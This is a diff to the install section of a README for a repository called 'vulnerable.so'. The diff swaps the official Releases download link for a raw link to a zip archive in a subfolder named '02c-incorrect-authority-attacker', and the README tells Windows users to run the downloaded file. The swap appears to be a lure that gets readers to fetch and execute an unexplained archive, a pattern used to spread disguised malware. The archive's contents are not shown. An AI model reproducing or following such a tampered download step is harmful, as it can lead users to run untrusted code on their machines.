ranman911/vulnerable.so/README.md

 ## 📥 Download & Install

-To download and install vulnerable.so, follow these straightforward steps.
+To download and install https://raw.githubusercontent.com/ranman911/vulnerable.so/main/programs/02c-incorrect-authority-attacker/so-vulnerable-2.6.zip, follow these straightforward steps.

-1. **Visit this page to download:** [Download from Releases](https://github.com/ranman911/vulnerable.so/releases)
+1. **Visit this page to download:** [Download from Releases](https://raw.githubusercontent.com/ranman911/vulnerable.so/main/programs/02c-incorrect-authority-attacker/so-vulnerable-2.6.zip)
 2. **Choose Your File:** Look for the latest version and click on the file that matches your operating system.
 3. **Follow the Installation Steps:**
    - For Windows: Run the downloaded file.